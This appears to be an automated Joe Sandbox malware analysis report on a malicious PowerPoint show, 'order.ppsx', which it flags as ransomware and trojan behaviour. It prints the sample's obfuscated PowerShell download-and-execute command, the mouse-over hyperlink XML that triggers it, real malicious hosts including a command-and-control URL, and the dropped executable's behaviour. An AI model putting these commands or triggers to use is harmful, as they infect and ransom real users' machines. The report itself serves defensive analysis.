Loading ...

Analysis Report

Overview

General Information

Joe Sandbox Version:19.0.0
Analysis ID:281044
Start time:17:15:38
Joe Sandbox Product:Cloud
Start date:28.05.2017
Overall analysis duration:0h 11m 4s
Report type:full
Sample file name:order.ppsx
Cookbook file name:defaultwindowsofficecookbook.jbs
Analysis system description:Windows 7 (Office 2010 v14.0.4, Java 1.8.0_40, Flash 16.0.0.305, Acrobat Reader 11.0.08, Internet Explorer 11, Chrome 55, Firefox 43)
Number of analysed new started processes analysed:14
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies
  • HCA enabled
  • EGA enabled
  • VBA Instrumentation enabled
Detection:MAL
Classification:mal96.evad.rans.troj.winPPSX@15/8@1/3
HCA Information:
  • Successful, ratio: 92%
  • Number of executed functions: 34
  • Number of non-executed functions: 232
EGA Information:
  • Successful, ratio: 100%
Cookbook Comments:
  • Found application associated with file extension: .ppsx
  • Found Word or Excel or PowerPoint document
  • Simulate clicks
  • Found security dialog
  • Click Ok
  • Number of clicks 104
  • Close Viewer
Warnings:
Show All
  • Exclude process from analysis (whitelisted): OSPPSVC.EXE, WmiApSrv.exe, conhost.exe
  • Skipping Hybrid Code Analysis (implementation is based on Java, .Net, VB or Delphi, or parses a document) for: POWERPNT.EXE, powershell.exe


Detection

StrategyScoreRangeReportingDetection
Threshold960 - 100Report FP / FNmalicious


Confidence

StrategyScoreRangeFurther Analysis Required?Confidence
Threshold50 - 5false
ConfidenceConfidence


Classification

Analysis Advice

Sample monitors Window changes (e.g. starting applications), analyze the sample with the 'Simulates keyboard and window changes' cookbook
Sample sleeps for a long time, analyze it with the 'Bypass long sleeps' cookbook
Sample tries to load a library which is not present or installed on the analysis machine, update the analysis machine



Signature Overview

Click to jump to signature section


Spam, unwanted Advertisements and Ransom Demands:

barindex
Ransomware detected (based on file extension or ransom instructions from fsrm.experiant.ca)Show sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\ii.jse

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Contains functionality for read data from the clipboardShow sources
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeCode function: 10_2_004022E6 GetProfilesDirectoryW,GetProfilesDirectoryW,GetProcessHeap,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,GetProfilesDirectoryW,GetProcessHeap,HeapAlloc,GetOpenClipboardWindow,GetProcessHeap,FindFirstFileW,GetProcessHeap,HeapAlloc,GetCommandLineA,GetProcessHeap,GetProcessHeap,HeapAlloc,GetForegroundWindow,lstrcmpW,GetProcessHeap,lstrcmpW,GetProcessHeap,HeapAlloc,GetCurrentProcessId,GetProcessHeap,GetProcessHeap,HeapAlloc,GetCurrentProcessId,GetProcessHeap,GetProcessHeap,HeapAlloc,GetMenuCheckMarkDimensions,wsprintfW,GetFileAttributesW,GetProcessHeap,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,FindNextFileW,FindClose,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,10_2_004022E6

Networking:

barindex
Downloads files from webservers via HTTPShow sources
Source: global trafficHTTP traffic detected: GET /c.php HTTP/1.1Host: cccn.nlConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /2.2 HTTP/1.1Host: cccn.nl
Found strings which match to known social media urlsShow sources
Source: wscript.exeString found in binary or memory: login.yahoo.com equals www.yahoo.com (Yahoo)
Source: wscript.exeString found in binary or memory: login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: wscript.exeString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Performs DNS lookupsShow sources
Source: unknownDNS traffic detected: queries for: cccn.nl
Urls found in memory or binary dataShow sources
Source: powershell.exeString found in binary or memory: file://
Source: POWERPNT.EXE, powershell.exeString found in binary or memory: file:///
Source: POWERPNT.EXEString found in binary or memory: file:///(
Source: POWERPNT.EXE, powershell.exeString found in binary or memory: file:///c:
Source: powershell.exeString found in binary or memory: file:///c:/w
Source: powershell.exeString found in binary or memory: file:///c:/windows/system32/windowsp
Source: powershell.exeString found in binary or memory: file:///c:/windows/system32/windowspowershell/v1.0/
Source: powershell.exeString found in binary or memory: file:///c:/windows/system32/windowspowershell/v1.0/$
Source: POWERPNT.EXEString found in binary or memory: file:///x
Source: powershell.exeString found in binary or memory: http://
Source: powershell.exeString found in binary or memory: http://ccc
Source: powershell.exeString found in binary or memory: http://cccn.nl
Source: powershell.exeString found in binary or memory: http://cccn.nl/2.2
Source: powershell.exeString found in binary or memory: http://cccn.nl/2.2h
Source: powershell.exeString found in binary or memory: http://cccn.nl/c.php
Source: wscript.exeString found in binary or memory: http://crl.comodo.net/utn-userfirst-hardware.crl0q
Source: wscript.exeString found in binary or memory: http://crl.comodoca.com/utn-userfirst-hardware.crl06
Source: wscript.exeString found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: wscript.exeString found in binary or memory: http://crl.entrust.net/server1.crl0
Source: wscript.exeString found in binary or memory: http://crl.pkioverheid.nl/domorganisatielatestcrl-g2.crl0
Source: wscript.exeString found in binary or memory: http://crl.pkioverheid.nl/domovlatestcrl.crl0
Source: wscript.exeString found in binary or memory: http://crl.usertrust.com/utn-userfirst-object.crl0)
Source: wscript.exeString found in binary or memory: http://crt.comodoca.com/utnaddtrustserverca.crt0$
Source: wscript.exeString found in binary or memory: http://cybertrust.omniroot.com/repository.cfm0
Source: powershell.exeString found in binary or memory: http://h
Source: wscript.exeString found in binary or memory: http://ocsp.comodoca.com0
Source: wscript.exeString found in binary or memory: http://ocsp.comodoca.com0%
Source: wscript.exeString found in binary or memory: http://ocsp.comodoca.com0-
Source: wscript.exeString found in binary or memory: http://ocsp.comodoca.com0/
Source: wscript.exeString found in binary or memory: http://ocsp.comodoca.com05
Source: wscript.exeString found in binary or memory: http://ocsp.entrust.net03
Source: wscript.exeString found in binary or memory: http://ocsp.entrust.net0d
Source: powershell.exeString found in binary or memory: http://schemas.dmtf.org/wbem/wsman/1/cimbinding/associationfilter
Source: powershell.exeString found in binary or memory: http://schemas.dmtf.org/wbem/wsman/1/wsman/selectorfilter
Source: powershell.exeString found in binary or memory: http://schemas.dmtf.org/wbem/wsman/identity/1/wsmanidentity.xsd#identifyresponseh
Source: wscript.exeString found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: wscript.exeString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: wscript.exeString found in binary or memory: http://www.public-trust.com/cgi-bin/crl/2018/cdp.crl0
Source: wscript.exeString found in binary or memory: http://www.public-trust.com/cps/omniroot.html0
Source: wscript.exeString found in binary or memory: http://www.usertrust.com1
Source: wscript.exeString found in binary or memory: https://185.159.82.38:45000/c/pollos.php?add=e9e45de07d328e8d46adf4357840be5e&506&uid=883565492&out=
Source: wscript.exeString found in binary or memory: https://secure.comodo.com/cps0
HTTP GET or POST without a user agentShow sources
Source: global trafficHTTP traffic detected: GET /c.php HTTP/1.1Host: cccn.nlConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /2.2 HTTP/1.1Host: cccn.nl
Detected TCP or UDP traffic on non-standard portsShow sources
Source: global trafficTCP traffic: 192.168.1.16:49235 -> 185.159.82.38:45000

Remote Access Functionality:

barindex
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)Show sources
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeCode function: 10_2_0040C5E5 GetProcessHeap,VirtualProtect,WSAStartup,socket,GetCurrentProcessId,GetProcessHeap,HeapAlloc,GetProcessWindowStation,inet_addr,htons,bind,GetProcessHeap,HeapFree,closesocket,GetProcessHeap,HeapFree,10_2_0040C5E5
Source: C:\Windows\System32\mstsc.exeCode function: 13_2_0006C5E5 GetProcessHeap,VirtualProtect,WSAStartup,socket,GetCurrentProcessId,GetProcessHeap,HeapAlloc,GetProcessWindowStation,inet_addr,htons,bind,GetProcessHeap,HeapFree,closesocket,GetProcessHeap,HeapFree,13_2_0006C5E5

Persistence and Installation Behavior:

barindex
Drops PE filesShow sources
Source: C:\Windows\System32\certutil.exeFile created: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe
May use bcdedit to modify the Windows boot settingsShow sources
Source: powershell.exeBinary or memory string: bcdedit.exe
Source: wscript.exeBinary or memory string: ~Wbcdedit.exe
Tries to download and execute files (via powershell)Show sources
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -NonI -W Hidden -Exec Bypass 'IEX (New-Object System.Net.WebClient).DownloadFile('http:'+[char] 0x2F+[char] 0x2F+'cccn.nl'+[char] 0x2F+'c.php',\'$env:temp\ii.jse\'); Invoke-Item \'$env:temp\ii.jse\''
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -NonI -W Hidden -Exec Bypass 'IEX (New-Object System.Net.WebClient).DownloadFile('http:'+[char] 0x2F+[char] 0x2F+'cccn.nl'+[char] 0x2F+'c.php',\'$env:temp\ii.jse\'); Invoke-Item \'$env:temp\ii.jse\''
Contains a malicious href mouse over activityShow sources
Source: slide1.xml.relsBinary or memory string: <Relationship Id="rId2" Target="powershell%20-NoP%20-NonI%20-W%20Hidden%20-Exec%20Bypass%20%22IEX%20(New-Object%20System.Net.WebClient).DownloadFile(%27http%3A%27%2B%5Bchar%5D%200x2F%2B%5Bchar%5D%200x2F%2B%27cccn.nl%27%2B%5Bchar%5D%200x2F%2B%27c.php%27%2C%5C%22%24env%3Atemp%5Cii.jse%5C%22)%3B%20Invoke-Item%20%5C%22%24env%3Atemp%5Cii.jse%5C%22%22" TargetMode="External" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink"/>

Data Obfuscation:

barindex
Contains functionality to dynamically determine API callsShow sources
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeCode function: 10_2_0040EFB9 EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,GetProcessHeap,GetProcessHeap,HeapAlloc,GetCapture,GetProcessHeap,GetProcessHeap,HeapAlloc,GetFocus,LoadLibraryA,GetProcAddress,GetCommandLineW,GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetModuleFileNameW,GetProcessHeap,RtlAllocateHeap,IsSystemResumeAutomatic,GetProcessHeap,GetModuleHandleW,ExitProcess,GetCurrentProcess,GetVersion,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetActiveWindow,GetProcessHeap,GetProcessHeap,HeapAlloc,GetModuleHandleW,GetProcessHeap,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,StrStrIW,StrStrIW,StrStrIW,CreateThread,CloseHandle,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,Sleep,10_2_0040EFB9
PE file contains an invalid checksumShow sources
Source: 484.exe.2988.drStatic PE information: real checksum: 0x0 should be: 0x3aa9d
Uses code obfuscation techniques (call, push, ret)Show sources
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeCode function: 10_1_00404048 push eax; retf 10_1_00404077
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeCode function: 10_1_00405C9C push eax; ret 10_1_00405DDC
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeCode function: 10_1_00403FDF push eax; retf 10_1_00404046
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeCode function: 10_1_00404F91 push edx; retf 0065h10_1_00404F9A
Suspicious powershell command line foundShow sources
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -NonI -W Hidden -Exec Bypass 'IEX (New-Object System.Net.WebClient).DownloadFile('http:'+[char] 0x2F+[char] 0x2F+'cccn.nl'+[char] 0x2F+'c.php',\'$env:temp\ii.jse\'); Invoke-Item \'$env:temp\ii.jse\''
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -NonI -W Hidden -Exec Bypass 'IEX (New-Object System.Net.WebClient).DownloadFile('http:'+[char] 0x2F+[char] 0x2F+'cccn.nl'+[char] 0x2F+'c.php',\'$env:temp\ii.jse\'); Invoke-Item \'$env:temp\ii.jse\''

Spreading:

barindex
Contains functionality to enumerate / list files inside a directoryShow sources
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeCode function: 10_2_004022E6 GetProfilesDirectoryW,GetProfilesDirectoryW,GetProcessHeap,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,GetProfilesDirectoryW,GetProcessHeap,HeapAlloc,GetOpenClipboardWindow,GetProcessHeap,FindFirstFileW,GetProcessHeap,HeapAlloc,GetCommandLineA,GetProcessHeap,GetProcessHeap,HeapAlloc,GetForegroundWindow,lstrcmpW,GetProcessHeap,lstrcmpW,GetProcessHeap,HeapAlloc,GetCurrentProcessId,GetProcessHeap,GetProcessHeap,HeapAlloc,GetCurrentProcessId,GetProcessHeap,GetProcessHeap,HeapAlloc,GetMenuCheckMarkDimensions,wsprintfW,GetFileAttributesW,GetProcessHeap,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,FindNextFileW,FindClose,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,10_2_004022E6
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeCode function: 10_2_0040DDBF lstrlenW,GetProcessHeap,GetProcessHeap,HeapAlloc,HeapFree,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,lstrcpyW,GetProcessHeap,HeapAlloc,GetProcessWindowStation,lstrcatW,lstrcpyW,GetProcessHeap,GetProcessHeap,HeapAlloc,GetOpenClipboardWindow,lstrcatW,FindFirstFileW,GetProcessHeap,lstrlenW,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,lstrcpyW,lstrcatW,lstrcatW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,10_2_0040DDBF
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeCode function: 10_2_00401E16 GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,GetCurrentProcessId,GetProcessHeap,GetProcessHeap,HeapAlloc,GetCurrentProcessId,GetProfilesDirectoryW,GetProcessHeap,wsprintfW,FindFirstFileW,StrCmpW,StrCmpW,StrCpyW,GetProcessHeap,HeapAlloc,GetProcessWindowStation,StrCatW,GetProcessHeap,GetProcessHeap,HeapAlloc,GetDoubleClickTime,wsprintfW,GetProcessHeap,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,FindNextFileW,FindClose,GetProcessHeap,HeapAlloc,GetDialogBaseUnits,ExpandEnvironmentStringsW,GetProcessHeap,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,10_2_00401E16
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeCode function: 10_2_0040BB40 GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,ReleaseCapture,GetProcessHeap,GetSystemDirectoryW,lstrcatW,FindFirstFileW,StrRChrW,FindNextFileW,FindFirstFileW,FindClose,GetProcessHeap,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,10_2_0040BB40
Source: C:\Windows\System32\mstsc.exeCode function: 13_2_00061E16 GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,GetCurrentProcessId,GetProcessHeap,GetProcessHeap,HeapAlloc,GetCurrentProcessId,GetProfilesDirectoryW,GetProcessHeap,wsprintfW,FindFirstFileW,StrCmpW,StrCmpW,StrCpyW,GetProcessHeap,HeapAlloc,GetProcessWindowStation,StrCatW,GetProcessHeap,GetProcessHeap,HeapAlloc,GetDoubleClickTime,wsprintfW,GetProcessHeap,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,FindNextFileW,FindClose,GetProcessHeap,HeapAlloc,GetDialogBaseUnits,ExpandEnvironmentStringsW,GetProcessHeap,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,13_2_00061E16
Source: C:\Windows\System32\mstsc.exeCode function: 13_2_000622E6 GetProfilesDirectoryW,GetProfilesDirectoryW,GetProcessHeap,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,GetProfilesDirectoryW,GetProcessHeap,HeapAlloc,GetOpenClipboardWindow,GetProcessHeap,FindFirstFileW,GetProcessHeap,HeapAlloc,GetCommandLineA,GetProcessHeap,GetProcessHeap,HeapAlloc,GetForegroundWindow,lstrcmpW,GetProcessHeap,lstrcmpW,GetProcessHeap,HeapAlloc,GetCurrentProcessId,GetProcessHeap,GetProcessHeap,HeapAlloc,GetCurrentProcessId,GetProcessHeap,GetProcessHeap,HeapAlloc,GetMenuCheckMarkDimensions,wsprintfW,GetFileAttributesW,GetProcessHeap,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,FindNextFileW,FindClose,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,13_2_000622E6
Source: C:\Windows\System32\mstsc.exeCode function: 13_2_0006BB40 GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,ReleaseCapture,GetProcessHeap,GetSystemDirectoryW,lstrcatW,FindFirstFileW,StrRChrW,FindNextFileW,FindFirstFileW,FindClose,GetProcessHeap,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,13_2_0006BB40
Source: C:\Windows\System32\mstsc.exeCode function: 13_2_0006DDBF lstrlenW,GetProcessHeap,GetProcessHeap,HeapAlloc,HeapFree,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,lstrcpyW,GetProcessHeap,HeapAlloc,GetProcessWindowStation,lstrcatW,lstrcpyW,GetProcessHeap,GetProcessHeap,HeapAlloc,GetOpenClipboardWindow,lstrcatW,FindFirstFileW,GetProcessHeap,lstrlenW,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,lstrcpyW,lstrcatW,lstrcatW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,13_2_0006DDBF
Enumerates the file systemShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft

System Summary:

barindex
Checks whether correct version of .NET is installedShow sources
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy\Upgrades
Found graphical window changes (likely an installer)Show sources
Source: Window RecorderWindow detected: More than 3 window changes detected
Uses Microsoft SilverlightShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll
Checks if Microsoft Office is installedShow sources
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEKey opened: HKEY_USERS\Software\Microsoft\Office\14.0\PowerPoint\Resiliency\StartupItems
Uses new MSVCR DllsShow sources
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEFile opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_50916076bcb9a742\MSVCR90.dll
Binary contains paths to debug symbolsShow sources
Source: Binary string: wscript.pdb source: wscript.exe
Source: Binary string: mscorrc.pdb source: powershell.exe
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb source: powershell.exe
Source: Binary string: indows\System.Management.Automation.pdbpdbion.pdb source: powershell.exe
Source: Binary string: System.Management.Automation.pdb source: powershell.exe
Source: Binary string: scrrun.pdb source: wscript.exe
Source: Binary string: wscript.pdbN source: wscript.exe
Classification labelShow sources
Source: classification engineClassification label: mal96.evad.rans.troj.winPPSX@15/8@1/3
Contains functionality to adjust token privileges (e.g. debug / backup)Show sources
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeCode function: 10_2_0040468D LookupPrivilegeValueA,AdjustTokenPrivileges,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,10_2_0040468D
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeCode function: 10_2_00401D22 GetProcessHeap,GetProcessHeap,HeapAlloc,GetMenuCheckMarkDimensions,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitWindowsEx,GetProcessHeap,ExitWindowsEx,GetProcessHeap,HeapFree,10_2_00401D22
Source: C:\Windows\System32\mstsc.exeCode function: 13_2_00061D22 GetProcessHeap,GetProcessHeap,HeapAlloc,GetMenuCheckMarkDimensions,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitWindowsEx,GetProcessHeap,ExitWindowsEx,GetProcessHeap,HeapFree,13_2_00061D22
Source: C:\Windows\System32\mstsc.exeCode function: 13_2_0006468D LookupPrivilegeValueA,AdjustTokenPrivileges,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,13_2_0006468D
Contains functionality to instantiate COM classesShow sources
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeCode function: 10_2_0040D4CA GetProcessHeap,HeapAlloc,GetDesktopWindow,CoInitialize,CoCreateInstance,CoTaskMemFree,StrStrIW,StrStrIW,StrStrIW,StrCpyNW,GetFileAttributesW,CoTaskMemFree,CoTaskMemFree,CoTaskMemFree,CoTaskMemFree,CoUninitialize,GetProcessHeap,HeapFree,10_2_0040D4CA
Creates files inside the user directoryShow sources
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\order.LNK
Creates temporary filesShow sources
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEFile created: C:\Users\LUKETA~1\AppData\Local\Temp\CVRF8B7.tmp
Found command line outputShow sources
Source: C:\Windows\System32\certutil.exeConsole Write: ...............v....I.n.p.u.t. .L.e.n.g.t.h. .=. .3.1.6.7.6.2........n30........R.a...............Aw,...*.........".....
Source: C:\Windows\System32\certutil.exeConsole Write: ...............v........#......v..0.........................#.......................R.a...........Aw(...................
Source: C:\Windows\System32\certutil.exeConsole Write: ...............v....O.u.t.p.u.t. .L.e.n.g.t.h. .=. .2.3.7.5.6.8.................R.a...........Aw..Aw,...,.........".....
Source: C:\Windows\System32\certutil.exeConsole Write: ...............v........#......v..0.........................#.......................R.a...........Aw(...................
Source: C:\Windows\System32\certutil.exeConsole Write: ...............v........#......v..0.........................#........................C.......)].1.Aw....b.........".....
Source: C:\Windows\System32\certutil.exeConsole Write: ...............v........#......v..0.........................#............................C......5.AwP...................
Source: C:\Windows\System32\cmd.exeConsole Write: ......................0.....(...0.......K.......................................!...@@ ...0.E.....0.....\....F"J....p.0.
Source: C:\Windows\System32\cmd.exeConsole Write: ....................A.c.c.e.s.s. .i.s. .d.e.n.i.e.d.........X.0.0.E.....V. J............X.0........v,.0.&...`.....,.....
Source: C:\Windows\System32\cmd.exeConsole Write: ......................0.....(...0.......[...........................F.......C....XAw@@ .(.0.}...@.0.....z....F"J......0.
Source: C:\Windows\System32\cmd.exeConsole Write: ........ ............ ....0...0.E. J........ .......@F#J. ....0.0.E. ...V. J..............0........v........`.....,.....
Parts of this applications are using the .NET runtime (Probably coded in C#)Show sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Queries process information (via WMI, Win32_Process)Show sources
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - Win32_Process.Handle=&quot;0&quot;::GetOwner
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - Win32_Process.Handle=&quot;4&quot;::GetOwner
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - Win32_Process.Handle=&quot;236&quot;::GetOwner
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - Win32_Process.Handle=&quot;316&quot;::GetOwner
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - Win32_Process.Handle=&quot;352&quot;::GetOwner
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - Win32_Process.Handle=&quot;360&quot;::GetOwner
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - Win32_Process.Handle=&quot;388&quot;::GetOwner
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - Win32_Process.Handle=&quot;444&quot;::GetOwner
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - Win32_Process.Handle=&quot;456&quot;::GetOwner
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - Win32_Process.Handle=&quot;464&quot;::GetOwner
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - Win32_Process.Handle=&quot;556&quot;::GetOwner
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - Win32_Process.Handle=&quot;620&quot;::GetOwner
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - Win32_Process.Handle=&quot;672&quot;::GetOwner
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - Win32_Process.Handle=&quot;792&quot;::GetOwner
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - Win32_Process.Handle=&quot;832&quot;::GetOwner
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - Win32_Process.Handle=&quot;856&quot;::GetOwner
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - Win32_Process.Handle=&quot;960&quot;::GetOwner
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - Win32_Process.Handle=&quot;1088&quot;::GetOwner
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - Win32_Process.Handle=&quot;1200&quot;::GetOwner
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - Win32_Process.Handle=&quot;1248&quot;::GetOwner
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - Win32_Process.Handle=&quot;1356&quot;::GetOwner
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - Win32_Process.Handle=&quot;1432&quot;::GetOwner
